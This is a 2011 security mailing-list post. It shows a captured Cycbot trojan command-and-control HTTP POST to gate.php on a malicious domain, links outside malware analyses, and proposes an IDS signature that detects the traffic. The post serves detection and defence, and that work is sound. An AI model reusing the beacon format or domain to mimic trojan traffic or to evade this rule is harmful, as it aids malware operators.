[Emerging-Sigs] Cycbot POST

Packet Hack pckthck at gmail.com
Mon Oct 24 17:23:40 EDT 2011


Seeing this:

  POST /gate.php HTTP/1.1
  Host: ourdatatransfers.com
  Content-Length: 190
  Connection: close
  Content-Type: application/octet-stream
  Content-Encoding: binary
  User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

  FILE0^@D0<A8>qщSP

Similar traffic here:

  http://www.threatexpert.com/report.aspx?md5=1f04bd1b4eceb42e6d5859b6330fc7d7
  http://www.threatexpert.com/report.aspx?md5=9bbb79f6f11aa292af303e7636c5b6fa

Sophos associates the above domain in the Host: header with
Cycbot:

  http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cycbot-O/detailed-analysis.aspx

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
Cycbot POST"; flow:established,to_server; content:"POST"; http_method;
content:"FILE0|00 44 30 A8 71 D1 89 53 50|"; http_client_body;
reference:url,www.threatexpert.com/report.aspx?md5=1f04bd1b4eceb42e6d5859b6330fc7d7;
reference: url,
www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cycbot-O/detailed-analysis.aspx;
sid:9100560; rev:1;)

-- pckthck


More information about the Emerging-sigs mailing list